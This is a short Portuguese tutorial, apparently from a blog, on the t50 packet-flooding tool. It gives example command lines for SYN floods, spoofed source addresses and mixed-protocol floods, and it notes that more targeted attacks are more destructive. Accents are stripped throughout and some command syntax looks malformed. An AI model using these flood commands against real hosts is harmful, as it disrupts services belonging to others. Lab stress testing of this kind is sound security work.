Conhea o t50: Ferramenta para stress test (Pentest

DDoS)!

O t50, uma ferramenta desenvolvida pelo brasileiro Nelson Brito, na prtica um

software capaz de realizar stress tests em redes ou servidores especficos utilizando

a tcnica de injeo de pacotes mesclando at 15 protocolos diferentes (TCP, UDP,

ICMP, IGMPv2, IGMPv3, EGP, DCCP, RSVP, RIPv1, RIPv2, GRE, ESP, AH, EIGRP,

OSPF, etc). Em outras palavras, qualquer sysadmin pode utilizar esta ferramenta

para realizar testes de penetrao em servidores utilizando um mix de ataques do

tipoDDoS (Distributed Denial of Service) Basicamente como ocorreu nos

episdios dos ltimos dias em sites do governo federal, quando crackers utilizaram

tcnicas do tipo. Obviamente que, como toda ferramenta do gnero, o t50 pode ser

utilizado tanto pelo lado negro da fora, quanto para antever falhas crticas de

segurana nos servios que rodam na sua rede.

Como usar

Vamos explorar um pouco o T50

./t50 192.168.1.10 --flood --turbo --dport (80 443) -S --protocol TCP

Neste o atacante flooda o IP, adiciona turbo, ataca as portas 80 e 443, usando apenas SYN no protocolo

TCP

./t50 192.168.1.12 --flood --turbo --dport (80) -S -s 10.10.0. --protocol TCP

Neste o atacando flooda o IP, adiciona turbo, ataca a porta 80 usando apenas SYN e mascara a origem

com o range 10.10.0.x no protocolo TCP

--protocol T50

Faz um random de todos os protocolos

--sport 80 --dport 443

Ataca atravs da porta de origem 80 no alvo 443

Quanto mais especfico o ataque melhor, mais destrutivo.

Faa um teste, crie 2 maquinas virtuais e faa o ataque.

Monitore com o Htop ou iptraf e vc ver a diferena

Download http://sourceforge.net/projects/t50/